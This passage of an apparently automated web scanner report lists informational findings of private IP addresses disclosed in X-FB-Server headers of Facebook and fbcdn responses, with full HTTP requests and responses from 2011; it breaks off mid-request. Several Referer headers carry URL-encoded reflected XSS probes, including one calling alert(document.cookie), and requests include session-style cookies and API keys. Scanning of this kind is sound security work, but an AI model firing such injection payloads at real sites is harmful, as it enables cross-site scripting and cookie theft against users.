Path:   /rsrc.php/v1/yj/r/RxZwFAf4oY9.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yj/r/RxZwFAf4oY9.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6000e528%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&locale=en_GB&numposts=10&sdk=joey&width=620
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 29 Mar 2011 00:35:02 GMT
X-FB-Server: 10.138.64.185
Vary: Accept-Encoding
Cache-Control: public, max-age=27946669
Expires: Wed, 28 Mar 2012 00:59:08 GMT
Date: Mon, 09 May 2011 14:01:19 GMT
Connection: close
Content-Length: 7142

/*1301360209,176832697*/

if (window.CavalryLogger) { CavalryLogger.start_js(["8PKAL"]); }

OauthLogin=function(b,a){this.provider=b;this.endpoint=a;return this;};OauthLogin.prototype.login=function(d
...[SNIP]...
20.10. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yo/r/VangFCcwoLx.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yo/r/VangFCcwoLx.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fb777bd4%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&href=www.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&locale=en_US&numposts=25&sdk=joey&width=630
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 417
Content-Type: image/png
Last-Modified: Mon, 08 Mar 2010 22:31:45 -0800
X-Powered-By: HPHP
X-FB-Server: 10.138.17.185
Cache-Control: public, max-age=26238780
Expires: Thu, 08 Mar 2012 06:32:18 GMT
Date: Mon, 09 May 2011 13:59:18 GMT
Connection: close

.PNG
.
...IHDR.............(-.S....PLTE.......................................................................................................................................MMM...@@@...............
...[SNIP]...
20.11. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zX/r/i_oIVTKMYsL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zX/r/i_oIVTKMYsL.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 92
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 08:00:35 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.184
Cache-Control: public, max-age=26787663
Expires: Wed, 14 Mar 2012 15:00:12 GMT
Date: Mon, 09 May 2011 13:59:09 GMT
Connection: close

.PNG
.
...IHDR..............o&....#IDAT.[c...v.....].....A..\.Y.,..@....\.-.    .....IEND.B`.
20.12. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=7da83be58ab0c1284412f725c119a00f&extern=0&channel=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.121.103
X-Cnection: close
Date: Mon, 09 May 2011 13:59:37 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
20.13. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=158577044196953&app_id=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3da0e71b4%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_GB&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13cbc9408%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5219f76%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8d6f6978%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5219f76&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ef9fcad%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5219f76&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df56c07c58%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5219f76&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2ef9fcad&origin=http%3A%2F%2Fwww.nme.com%2Ff272cfc8b4&relation=parent&transport=postmessage&frame=f5219f76
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.123.105
X-Cnection: close
Date: Mon, 09 May 2011 14:01:16 GMT
Content-Length: 0

20.14. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=9fb13b1113aed014ce53c005fe8c35a3&extern=0&channel=http%3A%2F%2Fwww.thevine.com.au%2Fmusic%2Fblogs%2Fmusic-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.105.117
X-Cnection: close
Date: Mon, 09 May 2011 14:01:09 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
20.15. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=c87f9494a93b2590633af39d1b8e347f&app_id=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1882bbf1%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13f3d1bb8%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df241ffe65%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3301b469%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17fe0c2e8%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3301b469&origin=http%3A%2F%2Fwww.indianasnewscenter.com%2Ff208516ccc&relation=parent&transport=postmessage&frame=fa9baf21c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.109.105
X-Cnection: close
Date: Mon, 09 May 2011 13:59:09 GMT
Content-Length: 0

20.16. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=MY%20APP%20ID&app_id=MY%20APP%20ID&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16a1716f4%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df319039ca%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1efb99044%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df381179ac%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df48d55258%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.112.112
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 22

Invalid Application ID
20.17. http://www.facebook.com/plugins/comments.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/comments.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6000e528%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&locale=en_GB&numposts=10&sdk=joey&width=620 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.124.129
X-Cnection: close
Date: Mon, 09 May 2011 14:01:17 GMT
Content-Length: 102275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.18. http://www.facebook.com/plugins/comments.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/comments.php?api_key=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fb777bd4%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&href=www.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&locale=en_US&numposts=25&sdk=joey&width=630 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.114
X-Cnection: close
Date: Mon, 09 May 2011 13:59:16 GMT
Content-Length: 14072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.19. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.100.125
X-Cnection: close
Date: Mon, 09 May 2011 14:08:54 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.20. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.108.128
X-Cnection: close
Date: Mon, 09 May 2011 14:08:50 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.21. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee0199fca83b=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.88.111
X-Cnection: close
Date: Mon, 09 May 2011 14:07:08 GMT
Content-Length: 8687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.22. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.117.103
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.23. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
